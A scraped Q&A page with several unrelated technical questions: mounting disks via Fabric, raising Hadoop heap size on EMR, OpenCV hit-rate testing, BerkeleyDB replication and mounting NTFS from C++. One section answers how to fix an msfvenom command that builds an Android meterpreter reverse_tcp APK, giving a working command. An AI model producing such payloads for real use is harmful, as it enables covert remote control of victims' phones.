How do I mount a disk drive using fabric

I have been trying to use these commands in Fabric to mount a disk, but the following code is not working:
sudo('echo "g\r\
n\r\
1\r\
\r\
\r\
w\r\
"|fdisk /dev/xvdb', pty=False)
sudo("mkfs.ext4 /dev/xvdb", pty=False)
sudo("mkdir -p /mnt/couchbase")
append('/etc/fstab',"/dev/xvdb1 /mnt/couchbase ext4 defaults 0 0", use_sudo=True)
sudo('mount /mnt/couchbase')
Any idea how I can improve on this?

OK, I found an answer to this:
sudo('echo "g\r\n\
n\r\n\
1\r\n\
%s\r\n\
%s\r\n\
"|fdisk /dev/xvdb' %('\n', '\n'))

Related

A problem creating a Metasploit payload in Termux

msfvenom -p android/meterpreter/reverse_tcp LHOST= ip LPORT=4444 R > /storage/hackmingtest.apk
bash: /storage/hackmingtest.apk: Permission denied
I have also used the command termux-setup-storage, but it is not working.
The solution to this question is very simple.
The /storage directory requires root access. The location you want is probably /storage/emulated/0/something.apk.
Alternatively, you can also use /sdcard/whatever.apk.
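Putting that together, the corrected command would look something like this (the LHOST value and the file name are placeholders to fill in):
msfvenom -p android/meterpreter/reverse_tcp LHOST=<your ip> LPORT=4444 R > /sdcard/whatever.apk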
🖖🏻

Increase HADOOP_HEAPSIZE in Amazon EMR to run a job with a few million input files

I am running into an issue with my EMR jobs where too many input files throw out-of-memory errors. From some research, I think changing the HADOOP_HEAPSIZE config parameter is the solution. Old Amazon forum posts from 2010 say it cannot be done.
Can we do that now, in 2018?
I run my jobs using the C# API for EMR, and I normally set configurations using statements like the ones below. Can I set HADOOP_HEAPSIZE with similar commands?
config.Args.Insert(2, "-D");
config.Args.Insert(3, "mapreduce.output.fileoutputformat.compress=true");
config.Args.Insert(4, "-D");
config.Args.Insert(5, "mapreduce.output.fileoutputformat.compress.codec=org.apache.hadoop.io.compress.GzipCodec");
config.Args.Insert(6, "-D");
config.Args.Insert(7, "mapreduce.map.output.compress=true");
config.Args.Insert(8, "-D");
config.Args.Insert(9, "mapreduce.task.timeout=18000000");
If I need to bootstrap using a file, I can do that too, if someone can show me the contents of the file for the config change.
Thanks
I figured it out...
I created a shell script to increase the memory size on the master machine (code at the end).
I run a bootstrap action like this:
ScriptBootstrapActionConfig bootstrapActionScriptForHeapSizeIncrease = new ScriptBootstrapActionConfig
{
    Path = "s3://elasticmapreduce/bootstrap-actions/run-if",
    Args = new List<string> { "instance.isMaster=true", "<s3 path to my shell script>" },
};
The shell script code is this:
#!/bin/bash
# Append a larger HADOOP_HEAPSIZE (in MB) to Hadoop's user env file.
# Defaults to 8192; pass a different size as the first argument.
SIZE=8192
if [ -n "$1" ]; then
    SIZE=$1
fi
echo "HADOOP_HEAPSIZE=${SIZE}" >> /home/hadoop/conf/hadoop-user-env.sh
Now I am able to run an EMR job with the master machine type set to r3.xlarge and process 31 million input files.
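For what it's worth, on EMR release 4.x and later the same setting can apparently be applied without a bootstrap script, using a configuration classification supplied at cluster creation; a sketch (the 8192 MB value is only an example):
[
  {
    "Classification": "hadoop-env",
    "Configurations": [
      {
        "Classification": "export",
        "Properties": { "HADOOP_HEAPSIZE": "8192" }
      }
    ]
  }
]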

performance.exe in OpenCV auto-closes when it finishes

I'm new to OpenCV. I have done the Haar training and get decent detection. However, when I want to check my hit rate using performance.exe, it runs until it finishes and then auto-closes, so I cannot check the hit rate. How do I solve this? Thanks.
Assuming you are running performance from the command prompt, go to the command line and run:
C:\Program Files\OpenCV\bin> performance -data TrainingSample.xml -info TestingSample\testsample.txt -sf 1.2 -w 15 -h 20 > TestResult.log
You need to place TestingSample.txt in the TestingImages folder; if you do not put TestingSample.txt into TestingImages, the performance program will execute but will not save or show any result. The > TestResult.log part redirects the output to a log file rather than the screen; you can remove it.
Adjust the OpenCV path as needed. Please post more details if you see any further problems.
Happy Coding :)
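If you are instead launching performance.exe by double-clicking it, the console window closes as soon as the program exits; one workaround (a suggestion, reusing the arguments from above) is to start it through cmd /k, which keeps the window open afterwards:
cmd /k performance -data TrainingSample.xml -info TestingSample\testsample.txt -sf 1.2 -w 15 -h 20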

How to set up replication in BerkeleyDB

I've been struggling for some time to set up a "simple" BerkeleyDB replication using the db_replicate utility.
However, I've had no luck making it actually work, and I'm not finding any concrete example of how things should be set up.
Here is the setup I have so far. The environment is Debian Wheezy with BDB 5.1.29.
Database generation
A simple Python script reads "CSV" files and inserts each line into the BDB file:
from glob import glob
from bsddb.db import DBEnv, DB
from bsddb.db import DB_CREATE, DB_PRIVATE, DB_INIT_MPOOL, DB_BTREE, DB_HASH, DB_INIT_LOCK, DB_INIT_LOG, DB_INIT_TXN, DB_INIT_REP, DB_THREAD

# Open a replication-ready environment (DB_INIT_REP) with a 32 MB cache.
env = DBEnv()
env.set_cachesize(0, 1024 * 1024 * 32)
env.open('./db/', DB_INIT_MPOOL | DB_INIT_LOCK | DB_INIT_LOG |
         DB_INIT_TXN | DB_CREATE | DB_INIT_REP | DB_THREAD)

# Store each CSV line as a key (no meaningful value).
db = DB(env)
db.open('apd.db', dbname='stuff', flags=DB_CREATE, dbtype=DB_BTREE)
for csvfile in glob('Stuff/*.csv'):
    for line in open(csvfile):
        db.put(line.strip(), None)
db.close()
env.close()
DB Configuration
In the DB_CONFIG file (this is where I'm missing the most important part, I guess):
repmgr_set_local_site localhost 6000
Actual replication attempt
# Copy the database file to begin with
db5.1_hotbackup -h ./db/ -b ./other-place
# Start replication master
db5.1_replicate -M -h db
# Then try to connect to it
db5.1_replicate -h ./other-place
The only thing I currently get from the replicate tool is:
db5.1_replicate(20648): DB_ENV->open: No such file or directory
Edit: after stracing the process, I found out it was trying to access __db.001, so I copied those files manually. The current output is:
db5.1_replicate(22295): repmgr is already started
db5.1_replicate(22295): repmgr is already started
db5.1_replicate(22295): repmgr_start: Invalid argument
I suppose I'm missing the actual configuration value for the client to connect to the server, but so far no luck, as all the settings I tried yielded "unrecognized name-value pair" errors.
Does anyone know how this setup might be completed? Maybe I'm not even headed in the right direction and this should be something completely different?
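A client-side DB_CONFIG would presumably need the client's own listening address, the master's address, and a non-zero priority. A sketch of what that might look like (repmgr_add_remote_site and rep_set_priority are assumptions to verify against the 5.1 DB_CONFIG reference, since not every method has a DB_CONFIG equivalent):
repmgr_set_local_site localhost 6001
repmgr_add_remote_site localhost 6000
rep_set_priority 50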

Mount an NTFS device in C++ on Linux?

I'm attempting to mount an external drive in my C++ application. I originally tried to use mount(2) but this fails:
int ret = mount(deviceName.c_str(), mountPoint.c_str(), fsType.c_str(), 0, NULL);
errno is 19, ENODEV (filesystem type not configured in kernel)
However, if I switch to using mount(8) it works fine:
std::string cmd = "mount -t " + fsType + " " + deviceName + " " + mountPoint;
int ret = system(cmd.c_str());
Does mount(2) have a different list of acceptable filesystem types? This is an NTFS device, so I was using ntfs-3g as the fstype. I checked /proc/filesystems and saw that this was not listed, so I tried fuseblk, but that just changes the error to 22, EINVAL.
What is the correct way to mount NTFS devices using mount(2)?
mount(2) is just a kernel call. mount(8) is a complete external tool that extends beyond what the kernel does.
I think you may be looking for libmount, which is a library implementing the whole mounting magic done by mount(8). Newer mount versions use it as well. It's provided in util-linux.
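A sketch of the libmount route (assuming the util-linux development headers are installed and the program links with -lmount; error handling trimmed):
#include <libmount/libmount.h>

// Mount via libmount, which knows how to invoke helpers such as
// mount.ntfs-3g, just like mount(8) does.
int mountWithLibmount(const char *device, const char *mountPoint)
{
    struct libmnt_context *cxt = mnt_new_context();
    if (!cxt)
        return -1;
    mnt_context_set_source(cxt, device);      // e.g. "/dev/sda1"
    mnt_context_set_target(cxt, mountPoint);  // e.g. "/mnt/windows"
    mnt_context_set_fstype(cxt, "ntfs-3g");   // helper = mount.ntfs-3g
    int rc = mnt_context_mount(cxt);          // 0 on success
    mnt_free_context(cxt);
    return rc;
}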
Have you tried running mount(8) under the strace command? It will print out the system calls made by the program, including mount(2). When I do such a mount, it spawns mount.ntfs (which is NTFS-3g), which then does a mount for fuseblk and then spins off into the background to support that mount point.
FUSE-based filesystems are handled differently because the user-space daemon must be started, and mounting with fuseblk doesn't provide enough information for the kernel to start the daemon (the kernel doesn't even really have the information needed to start it). For ntfs-3g, one would normally run something like ntfs-3g /dev/sda1 /mnt/windows (from the help). There isn't a programmatic way to tell the kernel to do this, because it happens in user space.
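Following that last point, a program can spawn the ntfs-3g helper itself instead of calling mount(2). A minimal sketch (assuming ntfs-3g is installed and on PATH; mountNtfs is a made-up helper name):
#include <string>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

// Mount an NTFS device by spawning the user-space ntfs-3g driver.
int mountNtfs(const std::string &device, const std::string &mountPoint)
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;                                  // fork failed
    if (pid == 0) {
        // Child: exec "ntfs-3g <device> <mountpoint>".
        execlp("ntfs-3g", "ntfs-3g",
               device.c_str(), mountPoint.c_str(), (char *)NULL);
        _exit(127);                                 // exec failed
    }
    // Parent: ntfs-3g forks into the background once the mount is
    // established, so its exit status tells us whether it worked.
    int status = 0;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return (WIFEXITED(status) && WEXITSTATUS(status) == 0) ? 0 : -1;
}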